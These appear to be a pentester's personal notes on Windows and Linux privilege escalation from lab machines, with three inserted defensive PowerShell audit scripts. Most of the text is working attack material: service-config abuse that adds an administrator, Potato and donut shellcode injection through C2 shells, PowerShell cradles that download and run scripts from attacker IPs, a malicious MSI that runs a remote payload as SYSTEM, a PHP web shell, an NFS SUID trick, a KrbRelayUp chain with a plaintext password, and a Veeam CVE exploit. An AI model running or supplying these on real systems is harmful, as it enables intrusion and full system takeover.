Windows Services
Unquoted Service Paths
Weak Service Permission
sharpup audit
sc.exe config snmptrap start= auto
sc config "SNMPTRAP" obj= "NT AUTHORITY\SYSTEM" password= ""
sc config "SNMPTRAP" binPath= "net localgroup Administrators final\nina /add"
sc stop "SNMPTRAP"
net localgroup Administrators
sc start "SNMPTRAP"
net localgroup Administrators
Weak Service Binary Permission
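Added audit script for the three service issues above (unquoted paths, weak service permissions, weak binary permissions); it is not from these notes or from SharpUp, and only reports findings plus the fix for an unquoted path. The set of low-privileged principals it checks is an assumption you may extend.

```powershell
# Added audit (not from the notes above): flags services whose binary path is unquoted and
# contains spaces, and service binaries or their folders writable by low-privileged groups.
$lowPriv   = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
$writeMask = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'

function Get-LowPrivWriters {
    # Returns the low-privileged principals holding any write right on $Path (empty if none)
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return @() }
    @($acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $lowPriv -contains $_.IdentityReference.Value -and
        ($_.FileSystemRights.value__ -band $writeMask.value__) -ne 0
    } | ForEach-Object { $_.IdentityReference.Value })
}

function Get-ServiceExposure {
    foreach ($svc in Get-CimInstance Win32_Service | Where-Object { $_.PathName }) {
        $path = $svc.PathName
        # Unquoted path with spaces: the SCM tries C:\Program.exe, C:\Program Files\X.exe, ... in order
        $m = [regex]::Match($path, '^(.*?\.exe)', 'IgnoreCase')
        if ($path -notlike '"*' -and $m.Success -and $m.Groups[1].Value.Contains(' ')) {
            [pscustomobject]@{ Service = $svc.Name; Issue = 'UnquotedPath'; Detail = $path
                               Fix = "sc.exe config $($svc.Name) binPath= `"$($m.Groups[1].Value)`"" }
        }
        # Resolve the executable (quoted or first token) and check who can overwrite it or its folder
        $exe = if ($path -match '^"([^"]+)"') { $matches[1] } elseif ($m.Success) { $m.Groups[1].Value } else { $null }
        if ($exe -and (Test-Path -LiteralPath $exe)) {
            $writers = @(Get-LowPrivWriters $exe) + @(Get-LowPrivWriters (Split-Path -Path $exe -Parent)) | Sort-Object -Unique
            if ($writers) {
                [pscustomobject]@{ Service = $svc.Name; Issue = 'WeakBinaryAcl'; Detail = $exe
                                   Fix = "remove write access for: $($writers -join ', ')" }
            }
        }
    }
}

Get-ServiceExposure | Format-Table -AutoSize -Wrap
```

Run it as a normal user; it needs no elevation because it only reads service configuration and file ACLs.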
UAC Bypass
Abusable Token Privileges
In Havoc Shell
dotnet inline-execute /home/jay/prolabs/cybernatics/SharpEfsPotato.exe -p demon_new.exe
In Sliver Shell
sliver (CASUAL_PLATFORM) > execute-assembly /home/jay/prolabs/cybernatics/SharpEfsPotato.exe -p CASUAL_PLATFORM.exe
You can also use PetitPotato after uploading it; dotnet inline-execute was not working for some reason.
If execute-assembly is not possible, upload both files and run the binary directly.
execute SharpEfsPotato.exe -p CASUAL_PLATFORM.exe
Normal Shell
PetitPotato.exe 3 demon_new.exe
SeImpersonate (Method 2: GodPotato)
Sharp.ps1
# PowerShell script to download and execute a script from a specified URL
$url = "http://10.8.2.41/amsi64.txt"
$scriptContent = (New-Object System.Net.WebClient).DownloadString($url)
Invoke-Expression $scriptContent
upload Godpotato.exe
./GodPotato-NET4.exe -cmd "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -executionpolicy bypass -file c:\windows\tasks\sharp.ps1"
SeImpersonate (Method 3: GodPotato + donut)
upload sharp.ps1
./donut -i /home/jay/vulnlab/breach/GodPotato-NET4.exe -a 2 -b 2 -o /tmp/payload.bin -p '-cmd "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -executionpolicy bypass -file c:\windows\tasks\sharp.ps1"'
execute notepad.exe
ps -e notepad
execute-shellcode -p 3604 /tmp/payload.bin
SeImpersonate (Method 3: PrintSpoofer + donut)
- Use the sph.exe file generated from sliverphollow above.
- Copy '/opt/Tools/privesc-windows/PrintSpoofer64.exe':
cp /opt/Tools/privesc-windows/PrintSpoofer64.exe .
upload sph.exe
./donut -i /home/jay/osep/challenge6/resources_development/PrintSpoofer64.exe -a 2 -b 2 -o /tmp/payload.bin -p '-c c:\windows\tasks\shp.exe'
execute notepad.exe
ps -e notepad
execute-shellcode -p 3604 /tmp/payload.bin
Local System, but SeImpersonate is missing or disabled.
https://github.com/itm4n/FullPowers
On Windows, some services executed as LOCAL SERVICE or NETWORK SERVICE are configured to run with a restricted set of privileges. Therefore, even if the service is compromised, you won’t get the golden impersonation privileges and privilege escalation to LOCAL SYSTEM should be more complicated. However, I found that, when you create a scheduled task, the new process created by the Task Scheduler Service has all the default privileges of the associated user account (except SeImpersonate). Therefore, with some token manipulations, you can spawn a new process with all the missing privileges.
upload /home/jay/tools/Fullpowers/FullPowers.exe
shell
./FullPowers.exe -c "powershell -ep bypass"
Always Install Elevated
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix
Bad.wix
<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
  <Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name"
           Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
    <Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
    <Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
    <Directory Id="TARGETDIR" Name="SourceDir">
      <Directory Id="ProgramFilesFolder">
        <Directory Id="INSTALLLOCATION" Name="Example">
          <Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
          </Component>
        </Directory>
      </Directory>
    </Directory>
    <Feature Id="DefaultFeature" Level="1">
      <ComponentRef Id="ApplicationFiles"/>
    </Feature>
    <CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR"
                  ExeCommand="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex (iwr http://10.10.15.207/large1.ps1 -UseBasicParsing)"
                  Return="ignore" Impersonate="no"/>
    <InstallExecuteSequence>
      <Custom Action="SystemShell" After="InstallInitialize"></Custom>
    </InstallExecuteSequence>
  </Product>
</Wix>

./candle.exe bad.wix
.\light.exe .\bad.wixobj

.\signtool.exe sign /fd SHA256 /sha1 b955c43dabda2dfb367d934b5b88dad2d94bedbb C:\Users\jay\Desktop\bad.msi
msiexec /quiet /qn /i bad.msi
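Added triage script for the package built above (not part of these notes): it reads the MSI's CustomAction table through the Windows Installer COM API, flags actions that are deferred and non-impersonated (the Execute="deferred" Impersonate="no" combination, which runs as SYSTEM), and checks whether AlwaysInstallElevated is set in both hives. The MSI path is a placeholder.

```powershell
# Added triage (not from the notes above): which custom actions in an MSI run as SYSTEM,
# and is the AlwaysInstallElevated policy active on this host.
function Get-MsiCustomActions {
    param([string]$MsiPath)
    $installer = New-Object -ComObject WindowsInstaller.Installer
    $full = (Resolve-Path -LiteralPath $MsiPath).Path
    $db   = $installer.GetType().InvokeMember('OpenDatabase', 'InvokeMethod', $null, $installer, @($full, 0))  # 0 = read-only
    $view = $db.GetType().InvokeMember('OpenView', 'InvokeMethod', $null, $db, @('SELECT `Action`,`Type`,`Source`,`Target` FROM `CustomAction`'))
    $view.GetType().InvokeMember('Execute', 'InvokeMethod', $null, $view, $null) | Out-Null
    while ($null -ne ($rec = $view.GetType().InvokeMember('Fetch', 'InvokeMethod', $null, $view, $null))) {
        $col  = 1..4 | ForEach-Object { $rec.GetType().InvokeMember('StringData', 'GetProperty', $null, $rec, @($_)) }
        $type = [int]$col[1]
        [pscustomobject]@{
            Action        = $col[0]
            Type          = $type
            Source        = $col[2]                     # directory/property the command runs from (e.g. TARGETDIR)
            Target        = $col[3]                     # the command line or script
            Deferred      = ($type -band 0x400) -ne 0   # msidbCustomActionTypeInScript
            NoImpersonate = ($type -band 0x800) -ne 0   # msidbCustomActionTypeNoImpersonate -> runs as SYSTEM
        }
    }
}

function Test-AlwaysInstallElevated {
    # The policy only takes effect when BOTH the machine and the user value are 1
    $set = foreach ($hive in 'HKLM', 'HKCU') {
        $v = Get-ItemProperty -Path "${hive}:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        [bool]($v -and $v.AlwaysInstallElevated -eq 1)
    }
    return ($set -notcontains $false)
}

$actions = Get-MsiCustomActions -MsiPath 'C:\path\to\suspect.msi'   # placeholder path
$actions | Where-Object { $_.Deferred -and $_.NoImpersonate } | Format-Table Action, Type, Source, Target -AutoSize -Wrap
if (Test-AlwaysInstallElevated) { Write-Warning 'AlwaysInstallElevated is set in HKLM and HKCU: any user can install such a package as SYSTEM' }
```

The remediation is to clear both AlwaysInstallElevated values; the custom-action listing tells you which packages would have run arbitrary commands as SYSTEM while the policy was on.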
Linux
nfs_share
- We have a shell as www-data.
- We see that there is a user "peter.turner@hybrid.vl" which we can't access.
- We have write access to an NFS share on the machine.
Because we can write to the NFS share, we can create files on it owned by peter's uid and then make a set-uid copy of bash, which lets us execute commands as that user.
On the victim machine:
id peter.turner@hybrid.vl
This gives us the uid of the user.
www-data@mail01:/opt/share$ cp /usr/bin/bash .
We copy /usr/bin/bash onto the NFS share on the victim machine.
On the attacker machine:
sudo adduser nfs_user
sudo sed -i -e 's/1001/902601104/g' /etc/passwd
The sed replaces the uid that adduser assigned to nfs_user (1001) with the uid obtained above, so files written by nfs_user over NFS are owned by peter's uid. On the attacker machine we copy the bash to /tmp, delete the bash on the share, copy it back to the share as nfs_user, and finally set the SUID bit:
cp bash /tmp/          # then remove bash from the share
su nfs_user
cp /tmp/bash .         # copy bash back into the NFS share
chmod +xs bash
As www-data we can run the bash with -p to get the euid of peter:
www-data@mail01:/opt/share$ ./bash -p
id
Now we can access peter's home directory.
Abusing Symbolic links on Windows
Method 1 - NTFS Mount Points/ Directory Junctions
To create a directory junction, the link directory must be empty and the user needs a write handle to the parent directory.
- There is a PHP upload feature that writes files into a folder where the attacker has write access.
- The attacker creates a junction with the command below. When the attacker then uploads a file and that folder already exists as the junction, the file lands in C:\xampp\htdocs.
- The user can then open shell.php from the web browser.
mklink /J C:\Windows\Tasks\Uploads\13f8945dedd4f14dbeab83ed8f7da3f6\ C:\xampp\htdocs
<?php
system($_REQUEST['cmd']);
?>
powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.8.2.41:80/amsi64.txt')"
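Added detection check for the junction technique above (not from these notes): it lists reparse points under a directory that untrusted users can write to and flags those whose target lies outside that root. The upload root path is a placeholder.

```powershell
# Added check (not from the notes above): find junctions/symlinks under a user-writable folder
# whose target escapes that folder, e.g. Uploads\<dir> -> C:\xampp\htdocs.
function Find-EscapingReparsePoints {
    param([string]$Root)   # placeholder: the folder the web app writes uploads into
    $rootFull = (Resolve-Path -LiteralPath $Root).Path.TrimEnd('\') + '\'
    Get-ChildItem -LiteralPath $Root -Recurse -Force -Attributes ReparsePoint -ErrorAction SilentlyContinue |
        ForEach-Object {
            $target = @($_.Target)[0]                           # string[] on PS 5.1, string on PS 7
            if (-not $target) { return }
            $target = $target -replace '^\\(\?\?|\\\?)\\', ''   # strip \??\ or \\?\ NT prefixes if present
            [pscustomobject]@{
                Link     = $_.FullName
                LinkType = $_.LinkType                          # Junction or SymbolicLink
                Target   = $target
                Escapes  = -not ($target.TrimEnd('\') + '\').StartsWith($rootFull, [System.StringComparison]::OrdinalIgnoreCase)
            }
        }
}

# Only links pointing outside the upload root matter. Remediation: delete the link and deny
# untrusted users write/reparse-point creation on the parent directory.
Find-EscapingReparsePoints -Root 'C:\Windows\Tasks\Uploads' | Where-Object Escapes | Format-Table -AutoSize
```

On Windows PowerShell 5.1, -Recurse follows junctions, so run it against a bounded tree; PowerShell 7 does not descend into them unless -FollowSymlink is given.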
Method that worked: privilege escalation by adding a machine account
execute-assembly ./CheckPort.exe
**CLSIDs** (confirmed working on Server 2019/2022 with ADCS installed):
- c980e4c2-c178-4572-935d-a8a429884806
- 90f18417-f0f1-484e-9d3c-59dceee5dbd8
- 03ca98d6-ff5d-49b8-abc6-03dd84127020
- d99e6e73-fc88-11d0-b498-00a0c90312f3 (certsrv.exe)
- 42cbfaa7-a4a7-47bb-b422-bd10e9d02700
- 000c101c-0000-0000-c000-000000000046
- 1b48339c-d15e-45f3-ad55-a851cb66be6b
- 49e6370b-ab71-40ab-92f4-b009593e4518
- 50d185b9-fff3-4656-92c7-e4018da4361d
- 3c6859ce-230b-48a4-be6c-932c0c202048 (trusted installer service)
execute-assembly ./KrbRelayUp.exe "full -m rbcd -c -cls {d99e6e73-fc88-11d0-b498-00a0c90312f3} -p 10246"
impacket-getST -impersonate 'Administrator' bruno.vl/'KRBRELAYUP$':'yT6#fH1-nK2$aH7=' -spn 'cifs/BRUNODC.bruno.vl'
export KRB5CCNAME=administrator@HOST_BRUNODC@BRUNO.VL.ccache
cme smb brunodc.bruno.vl -u 'Administrator' --use-kcache -M ntdsutil
VL{b528ba689d85ca396374c0f186087a7d}
https://gist.github.com/tothi/bf6c59d6de5d0c9710f23dae5750c4b9
https://arz101.medium.com/vulnlab-bruno-f0129f60ac40
https://notes.secure77.de/?link=%2FWriteUps%2FVulnLab%2FBruno%2FWriteup
Veeam
https://github.com/sfewer-r7/CVE-2023-27532
- Had to copy all the DLLs mentioned from the system the service is running on. https://www.horizon3.ai/attack-research/attack-blogs/veeam-backup-and-replication-cve-2023-27532-deep-dive/
- Changed the code to only have cmd functionality, as the DLL had problems for certain functions.
- You will find it in the tools folder and also in the backup folder.
- Had to change the compiler arch to x64.
- On the machine running the service, use the following command.
- Check first by executing notepad.exe.
./VeeamHax.exe --target 127.0.0.1 --cmd "C:\Users\Ferdinand\Desktop\Release\Release\exe_generation.exe"